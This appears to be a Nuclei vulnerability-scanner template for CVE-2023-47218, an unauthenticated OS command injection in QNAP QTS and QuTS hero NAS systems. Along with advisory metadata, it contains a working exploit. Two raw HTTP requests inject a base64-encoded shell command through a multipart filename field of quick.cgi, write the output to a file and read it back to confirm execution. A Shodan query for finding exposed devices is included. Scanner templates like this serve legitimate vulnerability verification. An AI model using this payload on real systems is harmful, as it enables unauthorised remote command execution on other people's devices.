id: CVE-2023-47218 info: name: QNAP QTS and QuTS Hero - OS Command Injection author: ritikchaddha severity: high description: | An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to execute commands via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.5.2645 build 20240116 and later QuTS hero h5.1.5.2647 build 20240118 and later QuTScloud c5.1.5.2651 and later. reference: - https://github.com/passwa11/CVE-2023-47218 - https://twitter.com/win3zz/status/1760224052289888668/photo/3 - https://www.rapid7.com/blog/post/2024/02/13/cve-2023-47218-qnap-qts-and-quts-hero-unauthenticated-command-injection-fixed/ - https://nvd.nist.gov/vuln/detail/CVE-2023-47218 classification: cvss-metrics: CVSS:3.0/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H cvss-score: 8.3 cwe-id: CWE-78 cve-id: CVE-2023-47218 metadata: verified: true max-request: 2 shodan-query: ssl.cert.issuer.cn:"QNAP NAS",title:"QNAP Turbo NAS" tags: cve,cve2023,qnap,qts,quts,rce,intrusive variables: file: '{{rand_base(6)}}' cmd: '%22$($(echo -n aWQ=|base64 -d)>{{file}})%22' http: - raw: - | POST /cgi-bin/quick/quick.cgi?func=switch_os&todo=uploaf_firmware_image HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data;boundary="avssqwfz" --avssqwfz Content-Disposition: form-data; xxpcscma="field2"; zczqildp="{{cmd}}" Content-Type: text/plain skfqduny --avssqwfz– - | POST /cgi-bin/quick/{{file}} HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'contains_all(body_1, "code\": 200", "full_path_filename success")' - 'contains_all(body_2, "uid=", "gid=")' - 'status_code == 200' condition: and # digest: 490a0046304402207c91f6f27dabb2e8ec3158c1c5677a2697bf0aac61c9f7fc4f5809796f63aa65022019831152413abfd5beccfb0ff90a9c194a5ac90dec6f7b4f781be1a395042786:922c64590222798bb761d5b6d8e72950